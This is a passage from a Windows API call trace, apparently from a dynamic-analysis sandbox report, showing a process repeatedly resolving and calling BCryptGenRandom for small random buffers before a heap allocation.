cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0218.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02379, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a02379) returned 0x0 [0218.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0218.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02394, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a02394) returned 0x0 [0218.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0218.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0218.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023ad, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a023ad) returned 0x0 [0218.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0218.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023d4, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a023d4) returned 0x0 [0218.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0218.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.892] GetProcessHeap () returned 0x440000 [0218.892] RtlAllocateHeap 